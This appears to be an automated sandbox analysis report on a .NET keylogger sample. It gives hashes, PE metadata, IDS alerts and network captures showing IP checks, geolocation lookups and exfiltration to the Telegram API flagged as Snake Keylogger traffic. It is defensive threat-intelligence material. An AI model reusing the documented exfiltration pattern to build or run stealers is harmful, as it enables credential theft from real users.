                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      UTMEMUSDdj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 132.226.8.169
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9advnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.48.1
                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      3b5074b1b5d032e5620f69f9f700ff0evnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 149.154.167.220
                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      No context
                                                                                      Process:C:\Users\user\Desktop\z87sammylastborn.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1119
                                                                                      Entropy (8bit):5.345080863654519
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                      MD5:88593431AEF401417595E7A00FE86E5F
                                                                                      SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                      SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                      SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                      Malicious:true
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.7267398314639495
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:z87sammylastborn.exe
                                                                                      File size:205'312 bytes
                                                                                      MD5:a5211c64910b02b059f301b05de54b16
                                                                                      SHA1:1f1ee1f8602bdc6400bc0290b1428e9f0362d4e9
                                                                                      SHA256:93b30930ca258fb9815309b89e3e5941d072832ab728a7af042f9c8d79a72d22
                                                                                      SHA512:d64f1162fd5f19fb1ace20583a3e9a16956b03561f8b9e2a6a621a93a7a010eecb1a9e16521dd98ec256f2e43946aee255f2d3960e17cdb1435326bc9d086b8c
                                                                                      SSDEEP:3072:uXjI4IweUBbWrT1KS2pgijHvCmeOtKkUeJEJ2WTi5Rg/N2FF:uTI6evHugijHvDeAU5J23g
                                                                                      TLSH:F414E65F3AF4419EF0F4063FB7224B0212B7F8C9B3D965064D211EDA6A05697369BEB0
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZA................0..............7... ...@....@.. ....................................@................................
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x43371e
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x827F415A [Thu May 19 00:31:22 2039 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x336c40x57.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x586.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x317240x318002f5592991ef704a086df04c69b22c333False0.6826714409722222data7.7536199191262964IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x340000x5860x6004713da45945b2a2056b5d5a9c5d1b92aFalse0.412109375data4.008929408222653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x360000xc0x2006f6bb9996e1bcbc53f04faf30c5d7cb1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0x340a00x2fcdata0.43324607329842935
                                                                                      RT_MANIFEST0x3439c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-10T23:44:32.994323+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706132.226.247.7380TCP
                                                                                      2025-01-10T23:44:39.242851+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706132.226.247.7380TCP
                                                                                      2025-01-10T23:44:39.863580+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549711149.154.167.220443TCP
                                                                                      2025-01-10T23:44:40.124585+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549711149.154.167.220443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 10, 2025 23:44:31.990811110 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:44:31.995915890 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:44:31.998667955 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:44:31.998888969 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:44:32.003988028 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:44:32.702743053 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:44:32.719873905 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:44:32.725043058 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:44:32.940507889 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:44:32.975780010 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:32.975828886 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:32.976274014 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:32.994323015 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:44:33.056798935 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:33.056830883 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:33.544758081 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:33.544830084 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:33.551790953 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:33.551810980 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:33.552649021 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:33.602214098 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:33.701813936 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:33.743335009 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:33.813875914 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:33.813963890 CET44349707104.21.48.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:33.814023972 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:33.828279972 CET49707443192.168.2.5104.21.48.1
                                                                                      Jan 10, 2025 23:44:38.976475000 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:44:38.981358051 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.194278002 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.206268072 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:39.206326962 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.206398964 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:39.206872940 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:39.206891060 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.242851019 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:44:39.815841913 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.815984964 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:39.817939043 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:39.817955017 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.818214893 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.819899082 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:39.863328934 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.863435030 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:39.863444090 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:40.124631882 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:40.124718904 CET44349711149.154.167.220192.168.2.5
                                                                                      Jan 10, 2025 23:44:40.124773979 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:44:40.125183105 CET49711443192.168.2.5149.154.167.220
                                                                                      Jan 10, 2025 23:45:15.187652111 CET6359853192.168.2.5162.159.36.2
                                                                                      Jan 10, 2025 23:45:15.192477942 CET5363598162.159.36.2192.168.2.5
                                                                                      Jan 10, 2025 23:45:15.192542076 CET6359853192.168.2.5162.159.36.2
                                                                                      Jan 10, 2025 23:45:15.197288990 CET5363598162.159.36.2192.168.2.5
                                                                                      Jan 10, 2025 23:45:15.679245949 CET6359853192.168.2.5162.159.36.2
                                                                                      Jan 10, 2025 23:45:15.684307098 CET5363598162.159.36.2192.168.2.5
                                                                                      Jan 10, 2025 23:45:15.684365988 CET6359853192.168.2.5162.159.36.2
                                                                                      Jan 10, 2025 23:45:44.190171957 CET8049706132.226.247.73192.168.2.5
                                                                                      Jan 10, 2025 23:45:44.190387011 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:46:13.822518110 CET4970680192.168.2.5132.226.247.73
                                                                                      Jan 10, 2025 23:46:13.827790976 CET8049706132.226.247.73192.168.2.5
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 10, 2025 23:44:31.974431992 CET6260453192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 23:44:31.981518030 CET53626041.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:32.957355976 CET5108553192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 23:44:32.967778921 CET53510851.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 23:44:39.198900938 CET6391853192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 23:44:39.205583096 CET53639181.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 23:45:15.187117100 CET5362715162.159.36.2192.168.2.5
                                                                                      Jan 10, 2025 23:45:15.804749966 CET53527931.1.1.1192.168.2.5
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 10, 2025 23:44:31.974431992 CET192.168.2.51.1.1.10x9125Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.957355976 CET192.168.2.51.1.1.10x19aaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:39.198900938 CET192.168.2.51.1.1.10x901bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 10, 2025 23:44:31.981518030 CET1.1.1.1192.168.2.50x9125No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:31.981518030 CET1.1.1.1192.168.2.50x9125No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:31.981518030 CET1.1.1.1192.168.2.50x9125No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:31.981518030 CET1.1.1.1192.168.2.50x9125No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:31.981518030 CET1.1.1.1192.168.2.50x9125No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:31.981518030 CET1.1.1.1192.168.2.50x9125No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.967778921 CET1.1.1.1192.168.2.50x19aaNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.967778921 CET1.1.1.1192.168.2.50x19aaNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.967778921 CET1.1.1.1192.168.2.50x19aaNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.967778921 CET1.1.1.1192.168.2.50x19aaNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.967778921 CET1.1.1.1192.168.2.50x19aaNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.967778921 CET1.1.1.1192.168.2.50x19aaNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:32.967778921 CET1.1.1.1192.168.2.50x19aaNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 23:44:39.205583096 CET1.1.1.1192.168.2.50x901bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      • reallyfreegeoip.org
                                                                                      • api.telegram.org
                                                                                      • checkip.dyndns.org
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549706132.226.247.73802276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 23:44:31.998888969 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 10, 2025 23:44:32.702743053 CET273INHTTP/1.1 200 OK
                                                                                      Date: Fri, 10 Jan 2025 22:44:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 10, 2025 23:44:32.719873905 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 10, 2025 23:44:32.940507889 CET273INHTTP/1.1 200 OK
                                                                                      Date: Fri, 10 Jan 2025 22:44:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 10, 2025 23:44:38.976475000 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 10, 2025 23:44:39.194278002 CET273INHTTP/1.1 200 OK
                                                                                      Date: Fri, 10 Jan 2025 22:44:39 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549707104.21.48.14432276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-10 22:44:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-10 22:44:33 UTC855INHTTP/1.1 200 OK
                                                                                      Date: Fri, 10 Jan 2025 22:44:33 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1863862
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6vN%2FrLhTN%2FgNj0k3dLTBnV0Cn1DZn8ouLAWF1FETRtKBz5uTYGB9nsto1YaO09bHJkEWFx0CdewX18QKLWbEDKWabIvNHjWJxgnCHnCh14S3Goh2qb%2BRCkPQMrVs1FUP1iyhYrI"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 9000313efa95c461-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
